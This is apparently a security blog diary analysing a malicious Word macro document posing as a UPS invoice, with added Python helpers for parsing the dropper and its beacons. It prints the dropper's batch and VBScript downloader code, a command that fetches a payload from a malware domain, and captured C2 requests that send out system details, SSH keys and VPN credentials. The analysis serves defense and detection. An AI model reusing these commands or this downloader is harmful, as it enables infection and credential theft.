My next class:
Reverse-Engineering Malware: Advanced Code AnalysisOnline | Greenwich Mean TimeOct 28th - Nov 1st 2024

Quick Analysis of a(nother) Maldoc

Published: 2020-01-09. Last Updated: 2020-01-09 12:15:01 UTC
by Xavier Mertens (Version: 1)
2 comment(s)

Yesterday, one of our readers (thanks David!) submitted a malicious document disguised as a UPS invoice. Like David, do not hesitate to share samples with us, we like malware samples! I briefly checked the document. Nothing new: it relies on a classic macro, it was easy to analyze, and I can give you an overview of the infection process and what kind of data can be exfiltrated.

The malicious document was called 'ups_invoice_0701932_262.doc' (SHA256: be0939cbb5ba129ef316149adc474b00ad9f526513a6f6f6f6adc802290c02af) and has a current VT score of 10/61 [1]. It contains macros that perform the malicious activity once the document is opened:

# oledump.py ups_invoice_0701932_262_doc 
A: word/vbaProject.bin
 A1:       734 'PROJECT'
 A2:        30 'PROJECTlk'
 A3:       233 'PROJECTwm'
 A4:        97 'UserForm1/\x01CompObj'
 A5:       294 'UserForm1/\x03VBFrame'
 A6:       883 'UserForm1/f'
 A7:      6688 'UserForm1/o'
 A8: M    1453 'VBA/Module1'
 A9: M   21943 'VBA/Module2'
A10: M    2239 'VBA/Module3'
A11: M    2331 'VBA/Module4'
A12: M  252836 'VBA/NewMacros'
A13: m     938 'VBA/ThisDocument'
A14: m    1493 'VBA/UserForm1'
A15:      8300 'VBA/_VBA_PROJECT'
A16:      1302 'VBA/dir'
A17: M  412655 'VBA/wLoadImages'

The infection path is the following: Word > Macro > Batch File (.cmd) > VBScript > Windows PE

The macro dumps a batch file on the disk (SHA256: 96d785cdc95bff2f081f57d2c9fdee3b76daf1c3295d2b9e6298678ed32953b9). The dropped file is '%APPDATA%\..EnableDelayedExpansion\Documents1.CMD'. Most of the commands are simple "echo" statements used to create a VBS script '%APPDATA%\..EnableDelayedExpansion\gdibits.vbs'.

Sample of the code, padded with garbage words and random digit strings to make it more difficult to read:

@echo off
echo "93319427177886784668351442764871949889113678316627428857276359"
set mtspf=%APPDATA%\..EnableDelayedExpansion\gdibits.vbs
echo 'To determine H. pylori resistance to clarithromycin >> %mtspf%
echo 'were designed against the 23S rRNA gene >> %mtspf%
echo Dim hResBit, MpicOffer, xmpage, MenuPrice, ListPrice, Fundament, BufferBat >> %mtspf%
echo On Error Resume Next >> %mtspf%
echo. >> %mtspf%
echo Set hResBit = Wscript.Arguments >> %mtspf%
echo 'To determine H. pylori resistance to clarithromycin >> %mtspf%
echo 'were designed against the 23S rRNA gene >> %mtspf%
echo "471495911668846928514952834168735538343318577458669595"
echo "137756746277365597113689825816848246219143776556384827"
echo "589196889244714223435471453592227671689523411938182673"
echo "714793381962982623587978735968646573151481843754943393"
echo Set MpicOffer = CreateObject("MSXML2.ServerXMLHTTP.6.0") >> %mtspf%
echo "72797134559562738358938549883642286878881617597196952189815336"
echo ListPrice = hResBit(0) >> %mtspf%
echo Fundament = hResBit(1) >> %mtspf%
echo 'The most common question that restaurants are asking us revolve >> %mtspf%
echo 'special accommodations) that may be requested >> %mtspf%
echo. >> %mtspf%
echo MpicOffer.Open "GET", ListPrice, False >> %mtspf%

Then the VBS script is launched with two arguments (see the Wscript.Arguments above): the URL to download and the local path of the payload:

cscript //nologo %APPDATA%\..EnableDelayedExpansion\gdibits.vbs hxxps://greatingusa[.]com/red1.res %APPDATA%\..EnableDelayedExpansion\hddput8.exe

Finally, hddput8.exe is launched:

start %APPDATA%\..EnableDelayedExpansion\hddput8.exe"
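To read what the dropper actually writes without wading through the noise, here is a small Python script (added here as an illustration, not part of the original diary or of the malware) that replays the batch file's 'set' and 'echo ... >> file' lines, discards the echoes that are not redirected anywhere, and strips the VBScript comment lines. The embedded batch excerpt is a constructed, shortened copy of the lines shown above.

```python
import re

# Constructed excerpt modelled on the dropper's batch file above (not the full script).
SAMPLE_CMD = r"""@echo off
echo "93319427177886784668351442764871949889113678316627428857276359"
set mtspf=%APPDATA%\..EnableDelayedExpansion\gdibits.vbs
echo 'To determine H. pylori resistance to clarithromycin >> %mtspf%
echo Dim hResBit, MpicOffer, xmpage, MenuPrice, ListPrice, Fundament, BufferBat >> %mtspf%
echo On Error Resume Next >> %mtspf%
echo. >> %mtspf%
echo Set hResBit = Wscript.Arguments >> %mtspf%
echo "471495911668846928514952834168735538343318577458669595"
echo Set MpicOffer = CreateObject("MSXML2.ServerXMLHTTP.6.0") >> %mtspf%
echo ListPrice = hResBit(0) >> %mtspf%
echo Fundament = hResBit(1) >> %mtspf%
echo MpicOffer.Open "GET", ListPrice, False >> %mtspf%
"""

SET_RE = re.compile(r"^\s*set\s+([^=]+)=(.*)$", re.IGNORECASE)
# 'echo.' writes an empty line; otherwise capture the text before the first '>>'.
ECHO_RE = re.compile(r"^\s*echo(\.|\s+(.*?))\s*>>\s*(\S+)\s*$", re.IGNORECASE)

def expand(text, env):
    """Expand %VAR% references that are known; leave unknown ones untouched."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1).lower(), m.group(0)), text)

def reconstruct(batch_text, env=None):
    """Return ({target_path: [lines written]}, junk_echo_count) for a batch dropper."""
    env = {k.lower(): v for k, v in (env or {}).items()}
    scripts, junk = {}, 0
    for raw in batch_text.splitlines():
        m = SET_RE.match(raw)
        if m:
            env[m.group(1).strip().lower()] = expand(m.group(2), env)
            continue
        m = ECHO_RE.match(raw)
        if m:
            line = "" if m.group(1) == "." else m.group(2)
            scripts.setdefault(expand(m.group(3), env), []).append(line)
        elif raw.lstrip().lower().startswith("echo"):
            junk += 1  # echo without redirection: the random-digit noise lines

    return scripts, junk

def strip_comments(lines):
    """Drop VBScript comment lines (') and blanks so only executable code remains."""
    return [l for l in lines if l.strip() and not l.lstrip().startswith("'")]
```

Passing env={"APPDATA": ...} to reconstruct() resolves the target path the way the victim's shell would; without it the %APPDATA% reference is kept verbatim.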

The PE file (SHA256: cfd98c1ee7ab19a63b31bcb6be133e6b61ce723f94a8f91741983bf79b4d1158) has a VT score of 44/72 [2].

Here are some HTTP POST requests with exfiltrated data performed by the malware:

POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/90 HTTP/1.1
Content-Type: multipart/form-data; boundary=aksgja8s8d8a8s97
User-Agent: KSKJJGJ
Host: 203.176.135.102:8082
Content-Length: 4419
Cache-Control: no-cache

--aksgja8s8d8a8s97
Content-Disposition: form-data; name="proclist"

***TASK LIST***

[System Process]
System
smss.exe
csrss.exe
wininit.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
lsm.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
spoolsv.exe
svchost.exe
taskhost.exe
dwm.exe
svchost.exe
svchost.exe
svchost.exe
notepad.exe
calc.exe
svchost.exe
notepad.exe
explorer.exe
iexplore.exe
WmiPrvSE.exe
rundll32.exe
svchost.exe

--aksgja8s8d8a8s97
Content-Disposition: form-data; name="sysinfo"

***S Y S T E M I N F O***

HostName: 3OwiR2Q
OSName: Microsoft Windows 7 Professional 
OSVersion: Service Pack 1
OSArchitecture: 64-bit
ProductType: Workstation
BuildType: Multiprocessor Free
RegisteredOwner: Zahwl3xniYy
RegisteredOrg: CVDh5l614
SerialNumber: 00371-222-2524677-68218
InstallDate: 30/12/1899 00.00.00
LastBootUpTime: 30/12/1899 00.00.00
WindowsDirectory: C:\Windows
SystemDirectory: C:\Windows\system32
BootDevice: \Device\HarddiskVolume1
TotalPhysicalMemory: 3127 Mb
AvailablePhysicalMemory: 3127 Mb


/c ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : <redacted>
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Realtek RTL8139C+ Fast Ethernet NIC
   Physical Address. . . . . . . . . : <redacted>
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : <Redacted>(Preferred) 
   IPv4 Address. . . . . . . . . . . : 192.168.100.6(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : Thursday, January 09, 2019 6:19:19 AM
   Lease Expires . . . . . . . . . . : Thursday, January 16, 2156 1:08:23 AM
   Default Gateway . . . . . . . . . : 192.168.100.1
   DHCP Server . . . . . . . . . . . : 192.168.100.1
   DHCPv6 IAID . . . . . . . . . . . : 240276480
   DHCPv6 Client DUID. . . . . . . . : <Redacted>
   DNS Servers . . . . . . . . . . . : 8.8.8.8
   NetBIOS over Tcpip. . . . . . . . : Disabled


/c net config workstation
Computer name                        \\<Redacted>
Full Computer name                   <Redacted>
User name                            Administrator

Workstation active on                
Software version                     Windows 7 Professional

Workstation domain                   WORKGROUP
Workstation Domain DNS Name          <Redacted>.com
Logon domain                         TESTER

COM Open Timeout (sec)               0
COM Send Count (byte)                16
COM Send Timeout (msec)              250

The command completed successfully.

/c net view /all
There are no entries in the list.

/c net view /all /domain
There are no entries in the list.

/c nltest /domain_trusts
Enumerating domain trusts failed: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF

/c nltest /domain_trusts /all_trusts
Enumerating domain trusts failed: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF

--aksgja8s8d8a8s97--

HTTP/1.1 200 OK
server: Cowboy
date: Thu, 09 Jan 2020 09:41:52 GMT
content-length: 3
Content-Type: text/plain

/1/

POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/81/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 203.176.135.102
Connection: close
Content-Type: multipart/form-data; boundary=---------PAOUUIBNQKZQDUJR
Content-Length: 210

-----------PAOUUIBNQKZQDUJR
Content-Disposition: form-data; name="data"

-----------PAOUUIBNQKZQDUJR
Content-Disposition: form-data; name="source"

OpenSSH private keys
-----------PAOUUIBNQKZQDUJR--

HTTP/1.1 200 OK
connection: close
server: Cowboy
date: Thu, 09 Jan 2020 09:42:07 GMT
content-length: 3
Content-Type: text/plain

/1/

POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/83/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 203.176.135.102
Connection: close
Content-Type: multipart/form-data; boundary=---------QPKAEZSIUTKMSAWM
Content-Length: 299

-----------QPKAEZSIUTKMSAWM
Content-Disposition: form-data; name="formdata"

{]}

-----------QPKAEZSIUTKMSAWM
Content-Disposition: form-data; name="billinfo"

{]}
-----------QPKAEZSIUTKMSAWM
Content-Disposition: form-data; name="cardinfo"

{SQL logic error
-----------QPKAEZSIUTKMSAWM--

HTTP/1.1 200 OK
connection: close
server: Cowboy
date: Thu, 09 Jan 2020 09:41:16 GMT
content-length: 3
Content-Type: text/plain

/1/

POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/81/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 203.176.135.102
Connection: close
Content-Type: multipart/form-data; boundary=---------ITSDTHZDVZQGMVVI
Content-Length: 219

-----------ITSDTHZDVZQGMVVI
Content-Disposition: form-data; name="data"

-----------ITSDTHZDVZQGMVVI
Content-Disposition: form-data; name="source"

OpenVPN passwords and configs
-----------ITSDTHZDVZQGMVVI--

HTTP/1.1 200 OK
connection: close
server: Cowboy
date: Thu, 09 Jan 2020 09:41:41 GMT
content-length: 3
Content-Type: text/plain

/1/
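As an added example (not from the diary or from the malware), the following Python parses a beacon like the ones above into the pieces a detection rule would key on: the victim tag carried in the URI, the numeric command code, the C2 host, and the multipart field names. The embedded request is a constructed, shortened copy of the 'OpenVPN' POST; reading the first URI segment before the underscore as the hostname is an assumption based on it matching the HostName in the sysinfo dump.

```python
import re
# Constructed request modelled on the captured beacons above (shortened, same layout).
SAMPLE_POST = (
    "POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/81/ HTTP/1.1\r\n"
    "Host: 203.176.135.102\r\n"
    "Connection: close\r\n"
    "Content-Type: multipart/form-data; boundary=---------ITSDTHZDVZQGMVVI\r\n"
    "\r\n"
    "-----------ITSDTHZDVZQGMVVI\r\n"
    'Content-Disposition: form-data; name="data"\r\n'
    "\r\n"
    "-----------ITSDTHZDVZQGMVVI\r\n"
    'Content-Disposition: form-data; name="source"\r\n'
    "\r\n"
    "OpenVPN passwords and configs\r\n"
    "-----------ITSDTHZDVZQGMVVI--\r\n"
)
# Form field names observed in the captured POSTs; any of them in a POST is worth an alert.
EXFIL_FIELDS = {"proclist", "sysinfo", "data", "source", "formdata", "billinfo", "cardinfo"}
# /red1/<hostname>_<tag>/<code>/ as seen above (treating segment 1 as hostname is an assumption)
URI_RE = re.compile(r"^/red1/([^_/]+)_([^/]+)/(\d+)/?$")

def parse_multipart(raw):
    """Split a raw HTTP request into (request line, headers, {field name: body})."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {k.strip().lower(): v.strip()
               for k, v in (h.split(":", 1) for h in header_lines if ":" in h)}
    m = re.search(r"boundary=(\S+)", headers.get("content-type", ""))
    fields = {}
    for part in (body.split("--" + m.group(1)) if m else []):
        if not part.strip() or part.startswith("--"):
            continue  # preamble before the first delimiter, or the closing "--"
        part_head, _, part_body = part.lstrip("\r\n").partition("\r\n\r\n")
        name = re.search(r'name="([^"]*)"', part_head)
        if name:
            fields[name.group(1)] = part_body.rstrip("\r\n")
    return request_line, headers, fields

def triage_beacon(raw):
    """Reduce a beacon to what a detection rule keys on: victim tag, code, flagged fields."""
    request_line, headers, fields = parse_multipart(raw)
    m = URI_RE.match(request_line.split(" ")[1])
    return {
        "c2_host": headers.get("host"),
        "victim_host": m.group(1) if m else None,  # matches HostName in the sysinfo dump
        "cmd_code": int(m.group(3)) if m else None,  # 90, 81 and 83 in the captures
        "fields": fields,
        "flagged": sorted(set(fields) & EXFIL_FIELDS),
    }
```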

Note that, at the time I'm writing this diary, the domain 'greatingusa[.]com' is still active. 

[1] https://www.virustotal.com/gui/file/be0939cbb5ba129ef316149adc474b00ad9f526513a6f6f6f6adc802290c02af/detection
[2] https://www.virustotal.com/gui/file/cfd98c1ee7ab19a63b31bcb6be133e6b61ce723f94a8f91741983bf79b4d1158/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key


Comments

re: we like malware samples!
I get interesting samples from time to time, but how do we submit them?
I can see how to submit firewall logs (just don't have access to any that I'm allowed to share, i.e. where security trips over security, sigh) but not how to best submit malware samples. Sounds like that would be a topic for a post, including any pre-processing we submitters could do to help the process along such as current scores on other (linked) testing tools.
There is no way to automate the submission of interesting samples. To send us interesting samples, use the contact form available here: https://isc.sans.edu/contact.html
